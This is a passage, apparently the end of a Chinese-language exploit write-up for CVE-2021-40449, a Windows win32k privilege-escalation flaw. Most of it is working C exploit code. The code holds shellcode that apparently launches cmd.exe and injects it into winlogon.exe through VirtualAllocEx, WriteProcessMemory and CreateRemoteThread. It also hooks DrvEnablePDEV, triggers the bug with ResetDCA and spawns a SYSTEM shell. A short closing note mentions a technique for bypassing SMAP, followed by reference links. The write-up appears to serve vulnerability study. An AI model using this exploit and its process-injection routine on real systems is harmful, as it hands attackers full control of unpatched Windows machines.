"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" \ "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" \ "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47" \ "\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64\x2e\x65" \ "\x78\x65\x00"; if ((processID = getProcessId("winlogon.exe")) == 0) { printf("[Error_%d] Couldn't retrieve process ID...\n", __LINE__); return; } printf("[+] Retrieved process id: %d\n", processID); hSystemProcess = OpenProcess(GENERIC_ALL, false, processID); if (hSystemProcess == INVALID_HANDLE_VALUE || hSystemProcess == (HANDLE)0) { printf("[Error_%d] Couldn't open system process...\n", __LINE__); return; } printf("[+] Got a handle on a system Process: %08p\n", hSystemProcess); pLibRemote = VirtualAllocEx(hSystemProcess, NULL, sizeof(shellcode) * 2, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (!pLibRemote) { printf("[Error_%d] Virtual alloc failed !\n", __LINE__); return; } printf("[+] Allocation in system process succeded with address %08p\n", pLibRemote); if (!WriteProcessMemory(hSystemProcess, pLibRemote, shellcode, sizeof(shellcode), NULL)) { printf("[Error_%d] WriteProcessMemory failed !\n", __LINE__); return; } HANDLE hThread = CreateRemoteThread(hSystemProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLibRemote, NULL, 0, NULL); printf("[+] Writing in system process succeded\n"); if (hThread == NULL) { printf("[Error_%d] CreateRemoteThread failed !\n", __LINE__); return; } else printf("[+] Remote thread created !\n"); CloseHandle(hSystemProcess); } int main() { if (Init()) { Hook_DrvEnablePDEV(); g::hdc = CreateDCA(NULL, g::szPrinterName, NULL, NULL); if (g::hdc == 0) { printf("[Error_%d] CreateDCA failed !\n", __LINE__); exit(-1); } g::bIsTrigger = TRUE; ResetDCA(g::hdc, NULL); if (CheckPrivilege(g::hToken)) { SpawnShell(); } else { printf("[Error_%d] Permission promotion failed!\n", __LINE__); } } system("pause"); return 0; }
从对 CVE-2021-40449的分析中,我学会了
win10下利用 Z w Q u e r y S y s t e m I n f o r m a t i o n \textcolor{cornflowerblue}{ZwQuerySystemInformation} ZwQuerySystemInformation和 N t S e t I n f o r m a t i o n T h r e a d \textcolor{cornflowerblue}{NtSetInformationThread} NtSetInformationThread绕过 SMAP的方法
[1] https://bbs.pediy.com/thread-269930.htm
[2] https://www.freebuf.com/vuls/306179.html
[3] https://www.jianshu.com/p/f8a210a97860
[4] https://nvd.nist.gov/vuln/detail/CVE-2021-40449
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